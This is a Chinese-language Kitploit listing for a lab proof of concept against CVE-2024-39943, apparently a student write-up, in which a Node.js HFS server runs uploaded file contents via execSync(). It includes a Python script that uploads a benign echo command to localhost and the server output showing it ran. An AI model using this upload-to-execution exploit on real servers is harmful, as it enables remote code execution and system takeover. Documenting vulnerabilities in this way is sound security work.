Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Node.js-CVE-2024-39943 — 概念验证漏洞利用程序,针对CVE-2024-39943,演示通过Node.js HFS服务器中的child_process.execSync()利用文件上传实现远程代码执行。 | Kitploit
工具/GitHubGitHub/jenmrr/node.js-cve-2024-39943
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHubjenmrr/node.js-cve-2024-39943

Node.js-CVE-2024-39943

概念验证漏洞利用程序,针对CVE-2024-39943,演示通过Node.js HFS服务器中的child_process.execSync()利用文件上传实现远程代码执行。

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Node.js HFS 命令执行漏洞 (CVE-2024-39943)

白帽学校第3期 – 鲁正民 (@JenmrR)


摘要

在基于 Node.js 的 HFS 服务器环境中,存在一个漏洞,该漏洞会将上传文件的内容通过 child_process.execSync() 执行。
攻击者可以通过文件上传功能直接执行操作系统命令,并可查看服务器内部命令结果或控制系统。
该漏洞对应 CVE-2024-39943,会产生与命令注入(远程代码执行)同等级别的威胁。


环境配置与运行

  1. 通过 Docker 环境运行服务器
  2. 服务器通过 /upload 路径接收文件上传,并将上传的文件内容直接作为命令执行
  3. 攻击者可通过上传实现 RCE

执行流程

root@kitploit:~
$ sudo docker-compose up --build -d
root@kitploit:~
$ python3 poc.py

poc.py

root@kitploit:~
import requests

payload = 'echo Hello_From_Hacked_Server'
files = { 'file': ('exploit.txt', payload) }

r = requests.post('http://localhost:8080/upload', files=files)
print(r.text)

结果

PoC 执行后的服务器响应:

root@kitploit:~
Executed:
Hello_From_Hacked_Server

poc-result


总结

  • 本漏洞是将外部输入作为 OS 命令执行时发生的典型 RCE(远程命令执行)漏洞。
  • 直接将上传文件内容通过 execSync() 执行的方式会引发严重的安全风险。
  • 用户输入应始终进行验证,并且不应在服务器内直接执行。

下载工具